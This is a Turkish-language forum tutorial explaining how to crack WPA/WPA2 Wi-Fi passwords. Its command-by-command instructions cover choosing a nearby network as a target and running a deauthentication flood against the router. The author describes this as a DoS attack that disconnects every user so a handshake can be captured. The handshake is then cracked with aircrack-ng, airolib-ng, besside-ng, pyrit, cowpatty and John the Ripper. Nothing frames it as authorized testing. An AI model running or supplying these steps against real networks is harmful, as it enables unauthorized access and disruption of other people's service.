--
Merhaba
Bu konuda wifi şifre kırma yöntemlerinde kullandiğimiz bütün toolları tek bir konuda detaylı bir şekilde anlatacam sizlere.Bu yöntemler wpa/wpa2 wifi ağları için geçerlidir.
Şimdik konumuza dönelim ve işlemlere başlıyalım.
airmon-ng wifi kartimizi aktif etmemize yarayan script'tir.
Kod:
airmon-ng
Bu komut ile wifi kartima baktim.Benim wifi kartım wlan0, sizin monitor mode wlan1 veya wlan2 olabilir buna dikkat ediniz.
Kod:
airmon-ng start wlan0
Bu komut ile wifi kartimizi dinleme moduna aldik ve monitor mode benim wlan0mon oldu.
Şimdik sıra geldi çevredeki kablosuz yayin yapan wifi ağlarını listelemeye.
Kod:
airodump-ng wlan0mon
Bu komut ile çevredeki wifi ağlarını listeledik ve arasından bir hedef seçiyoruz
Seçtiğimiz wifi ağının (BSSID) adresini ve (CHANNEL) kanal numarasını not aliyoruz.
Kod:
airodump-ng wlan0mon --channel 6 --bssid 00:00:00:00:00 --write ch_arli41
--channel yayin yaptığı kanal numarasi
--bssid mac adresi
--write kaydedilecek dosya adı
Yukarda yazdığım komut ile hedefimde'ki wifi ağını dinlemeye aldım.STATION kısmında kaç kişi bağlı wifi ağına görebilirsiniz.
Şimdik geldik önemli bir noktaya burda yapacağımız, wifi ağına bağlı cihaz veya cihazların bağlantısını kesmek.Cihaz veya cihazlar wifi ağına tekrar bağlandığı zaman biz handshake yani (el sıkışma) dosyasi yakalamış oluyoruz.Bunun için aireplay-ng kullanacaz.
Kod:
aireplay-ng -0 3 -a 00:00:00:00:00 wlanom0n
Yukarıda yazdığım komut'da oynama yapabilirsiniz. -0 0 yaptığımızda kendi durmaz bunun için CTRL+C yapıp durdururuz yada -0 10 yapatığımızda 10 sefer attack yapıp kendisi durur limiti siz belirlersiniz.
Burda dikkat ediniz genelde herkezin kullandığı yöntem bağlı olan bir cihazı wifi ağından atmaktır.Benim kullandığım komut ile wifi ağına modeme direk dos attack yapıyoruz böylelikle herkesin bağlantısı kesiliyor.Bu yöntemle hadshake yakalamamiz daha çabuk oluyor.
Resimde sağ üst tarafta WPA handshake yaziyor demekki handshake (el sıkışma) yakaladık.
Bide bunu aircrack-ng ile kontrol edelim ve şifre kırma işlemine geçelim.
Kod:
aircrack-ng ch_arli41-01.cap
Burda siz hangi ismi verdiyseniz o cap dosyasinin ismini yazacaksınız.Birtane handshake yakalamışız artık şifre kırma işlemine başlaya biliriz.
Kod:
aircrack-ng -a 2 handshake.cap -w wordlist-yolunuz.txt
Şifre kırma işlemi başarlı oldu.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++
airolib-ng kullanimi.
airolib-ng ile db oluşturuyoruz bu sayede ortalama 100 mb'lik wordlist'i aircrack-ng kullanarak 20 saat sürer yada dahada uzun süre bilir ama db oluşturduk mu ozaman bu süre 5 dakika olur.internette hazir db'ler var onlarıda kullana bilirsiniz.Dikkat etmeniz tek nokta o db'in içinde sizin şifresini kırmaya çalştınız wifi ağının adı yazmasi, artık anlatıma geçelim.
Kod:
airolib-ng wpa --import passwd sifreler.txt
Burdaki sifreler.txt sizin wordlist dosyaniz olacak.
Kod:
airolib-ng wpa --import essid essid.txt
Burda essid.txt yani wifi ağının adını not defterine yazıp onu belirtin.
Kod:
airolib-ng wpa --clean all
Kod:
airolib-ng wpa --stats
bu komut ile bilgileri kontrol ediyoruz.
Kod:
airolib-ng wpa --batch
Bu komut ile artık db oluşuyor.Burda verdiğimiz wordlistin büyüklüğüne göre uzun sürer.
Kod:
aircrack-ng -r wpa hadshake.cap
Bu komut ile şifre kırma işlemini başlattık ve saniyeler içinde şifre kırıldığı.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Besside-ng nedir.
besside-ng yukarda uyguladığımız handshake yakalamak olayını otomatik yapan tool'dur.Kısaca airodump-ng ve aireplay-ng kullanmamıza gerek kalmadan tek bir tool ile handshake yakalıya biliyoruz evet artık anlatıma geçelim.
Kod:
besside-ng -h
Bu komut ile tool'un komutlarına bakarız.
Kod:
besside-ng -c 6 -b 00:00:00:00:00 wlan0mon
-c wifi ağının yayın yaptığı kanal numarası.
-b wifi ağının mac adresi.
wlan0mon airmon-ng ile dinleme moduna aldığımız monitor mode.
Kod:
besside-ng wlan0mon
Bu komut ile çevrenizdeki bütün wifi ağlarını tarayıp handshake yakalar
Kod:
cat besside-ng
Bu komut ile handshake'yi kontrol ettik.Bide aircrack-ng ile kontrol edelim.
Kod:
aircrack-ng wpa.cap
aircrack-ng ilede kontrol ettik hadshake'yi yakaladık.Şifre kırma işlemini yukarda anlattığım gibi yapa bilirsiniz.
Root dizininde 3 tane dosya oluşur.WEp.cap, wpa.cap ve besside.log olarak şifre kırmak için wpa.cap dosyasını kullanıyoruz.
--------------------------------------------------------------------------------------------------------------------
Şifre Kırma Yöntemleri
Pyrit Nedir Nasıl Kullanılır
Pyrit WPA/WPA2-PSK parolalarını kırmak için geliştirilmiş bir yazılımdır.En önemli özelligi CPU'ya ek olarak grafik işlemcilerini kullanarak parola kırma islemlerini hızlı yapmasıdır.
Kod:
pyrit
Bu komut ile kullana bilecegimiz yardimci komutlari görüyoruz
Kod:
pyrit benchmark
Bu komut ile cpu ve gpu'larin saniyede ne kadar işlem yapacagini görüyoruz.
Kod:
pyrit -r wpa.cap analyze
Bu komut ile hadshake dosyamizi analiz ediyoruz.
Kod:
pyrit -e ESSID create_essid
Bu komut ile pyrit'in databasesi'ne modemin ismini ekledik.
Kod:
pyrit -i wordlist.txt import_passwords
Bu komut ile pyrit'in databasesi'ne şifre listemizi ekledik.
Kod:
pyrit batch
Bu komut ile pyrit database'yi oluşturuyor.Bu işlem bilgisayarınızın ve wordlist'in boyutuna göre uzun süre bilir.
Kod:
pyrit -r wpa.cap attack_db
Bu komut ile şifre kırma işlemini baslatıyoruz.Database oluşturduğmuz için saniyeler içinde şifre kırılıyor.
Kod:
pyrit -r wpa.cap -i wordlist.txt -b BSSID attack_passthrough
Database oluşturmak istemiyorsak ozaman bu komut ile direk şifre kirma işlemini yapabilirsiniz.
Bu konular ile ilgili sorunuz var ise sorabilirsiniz konu yakin zamanda güncellenecektir.
Cowpatty Kullanimi
cowpatty wpa/wpa2-psk şifrelerini kırmak için geliştirilmiş bir script'dir.
Kod:
cowpatty
Bu komut ile scriptin yardımcı komutlarını görürüz.
Kod:
cowpatty -r wpa.cap -f wordlist.txt -s modem-ismi
-r handshake dosyasi
-f wordlist (şifre) listemizin bulunduğu dosya
-s modemin ismi.
Bu komut ile şifre kırma işlemini başlatıyoruz.
--------------------------------------------------------------------------
John the ripper Nedir.
John the ripper bildiğimiz şifreleme yöntemleri için geliştirilmiş hashlar'ın şifrelerini kırmak için kullandığımız bir yardımcı yazılımdır.
Kod:
aircrack-ng wpa.cap -J yeni-isim
Burdaki komut ile cap dosyasından, hccap formatında yeni bir dosya oluşturuyoruz.
Kod:
hccap2john wpa22.hccap > wpa11
Burdaki komutda ise oluşturmuş olduğumuz hccap dosyasınını değiştirip yeni bir dosya oluşturuyoruz.
Kod:
john wpa11
Burdaki komut ile şifre kırma işlemine başlıyoruz.Burda dikkat etmeniz gereken wpa11 burda siz hangi ismi verdiyseniz onu yazınız.
